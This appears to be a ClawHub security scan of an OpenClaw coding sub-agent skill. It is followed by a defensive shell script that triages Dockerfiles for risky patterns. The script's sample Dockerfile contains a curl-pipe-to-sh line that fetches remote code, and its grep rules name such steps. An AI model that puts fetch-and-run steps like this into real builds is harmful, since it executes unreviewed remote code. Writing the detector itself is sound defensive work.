Skill v0.1.3

ClawScan security

Coder for OpenClaw · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Mar 8, 2026, 9:07 PM
Verdict
benign
Confidence
high
Model
gpt-5-mini
Summary
The skill is internally consistent with its stated purpose (wiring a coding sub-agent for OpenClaw) and asks only for tools and config that match that purpose. Installing it, however, requires pulling and building code from a third-party GitHub repo, so review the repo and its Dockerfile before proceeding.
Guidance
This skill appears to do what it says, but installation requires cloning a third-party GitHub repo and building its Docker image. Before installing: review the repository (especially Dockerfile, workspace-coder/SOUL.md, and agent-config.template.json) for unexpected actions; run the Docker build in an isolated environment if you do not fully trust the source, since build steps execute code; confirm you are comfortable giving this sub-agent access to the OpenClaw openai-codex provider profile (usage, costs, and API access); back up openclaw.json before registering the new agent; and run the provided smoke tests in a safe sandbox first.

Review Dimensions

Purpose & Capability
ok · Name, description, required binaries (openclaw, docker, git), and required OpenClaw config/provider profile align with the stated goal of installing a coding-focused OpenClaw sub-agent. The listed actions (copy workspace-coder, register agent, build sandbox image) are expected for this capability.
Instruction Scope
note · Runtime instructions are limited to cloning the listed GitHub repo, copying agent files into your OpenClaw directory, building a Docker sandbox image, and registering the agent in openclaw.json. They do not request unrelated system files or credentials. However, the instructions do require building and running third-party code (the Docker image and workspace contents), so you should inspect the repository and SOUL/agent files before installing.
Install Mechanism
note · No automated install spec is provided; installation is instruction-driven via git clone and docker build from a GitHub repo. GitHub is a common host (expected), but building a Docker image from remote source can execute arbitrary code during the build (RUN steps, fetched scripts), so review the Dockerfile and repo before building.
Credentials
ok · The skill requests no new environment variables itself. It does require an authenticated openai-codex provider profile in OpenClaw (expected for a coding LLM sub-agent). Be aware the sub-agent will use whatever provider credentials are present in OpenClaw (possible usage/cost implications and access to provider APIs).
Persistence & Privilege
ok · The skill is not always:true and is user-invocable; it will register an agent in openclaw.json (expected behavior for adding a sub-agent). There is no indication it modifies other skills or system-wide agent settings beyond registering itself.
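The Guidance above and the Install Mechanism note both come down to one pre-install routine: locate the files worth reading, triage the Dockerfile for build-time code execution, and back up openclaw.json before the agent is registered. The script below is an added example written for this page; it is not ClawHub scanner code and not part of the skill's repository. The repo path, config path, and the sample Dockerfile it checks are all constructed assumptions, and the regex triage is a coarse first pass, not a replacement for reading the files.

```shell
#!/bin/sh
# Added pre-install review helper (example code for this page, not from
# ClawHub or the skill's repo). Assumed, hypothetical layout: the cloned repo
# at $REPO_DIR and your OpenClaw config at $OPENCLAW_CONFIG. Set both to match
# your machine.
REPO_DIR="${REPO_DIR:-./coder-for-openclaw}"
OPENCLAW_CONFIG="${OPENCLAW_CONFIG:-$HOME/.openclaw/openclaw.json}"

# list_review_targets DIR: prints the files the scan guidance says to read
# before installing; returns 1 if any of them is missing from the checkout.
list_review_targets() {
  dir="$1"; missing=0
  for rel in Dockerfile workspace-coder/SOUL.md agent-config.template.json; do
    if [ -f "$dir/$rel" ]; then
      echo "review: $dir/$rel"
    else
      echo "missing: $dir/$rel" >&2; missing=1
    fi
  done
  return "$missing"
}

# flag_dockerfile_risks FILE: prints every line matching a pattern that runs
# or fetches remote code at build time, widens permissions, disables TLS
# verification, or embeds a secret. Returns 1 if anything matched, 0 if clean.
# Coarse triage only; a clean result does not mean the Dockerfile is safe.
flag_dockerfile_risks() {
  if grep -nE \
      -e '(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh' \
      -e '^[[:space:]]*ADD[[:space:]]+https?://' \
      -e 'chmod[[:space:]]+(-R[[:space:]]+)?[0-7]?777' \
      -e '(--insecure|--no-check-certificate)' \
      -e '(API_KEY|SECRET|TOKEN|PASSWORD)[[:space:]]*=' \
      "$1"; then
    return 1
  fi
  return 0
}

# backup_openclaw_config FILE: copies the config to FILE.bak.<UTC timestamp>
# before the agent is registered, and prints the backup path.
backup_openclaw_config() {
  cfg="$1"
  [ -f "$cfg" ] || { echo "no config at $cfg" >&2; return 1; }
  bak="$cfg.bak.$(date -u +%Y%m%dT%H%M%SZ)"
  cp -p "$cfg" "$bak" && echo "$bak"
}

# Constructed sample Dockerfile (not the skill's real one) so the check can be
# exercised offline; line 3 is the kind of step the scan warns about.
DEMO_DIR="${TMPDIR:-/tmp}/clawscan-demo.$$"
mkdir -p "$DEMO_DIR"
trap 'rm -rf "$DEMO_DIR"' EXIT
cat > "$DEMO_DIR/Dockerfile" <<'EOF'
FROM python:3.12-slim
RUN apt-get update && apt-get install -y --no-install-recommends git
RUN curl -fsSL https://example.invalid/setup.sh | sh
COPY workspace-coder /workspace
EOF

if flag_dockerfile_risks "$DEMO_DIR/Dockerfile"; then
  echo "Dockerfile: no risky patterns found"
else
  echo "Dockerfile: inspect the lines above before running docker build" >&2
fi

# On the real checkout the order is: list_review_targets "$REPO_DIR";
# flag_dockerfile_risks "$REPO_DIR/Dockerfile"; read every flagged file;
# backup_openclaw_config "$OPENCLAW_CONFIG"; only then docker build, in an
# isolated environment, with --pull --no-cache so no stale local layer or
# base image is silently reused.
```

The curl-pipe-shell pattern is the one to treat as a hard stop: whatever that URL serves at build time is what ends up in your sandbox image, and it can change between the moment you review the repo and the moment you build. The backup function writes a timestamped copy next to the original so that a bad registration can be reverted by copying the .bak file back.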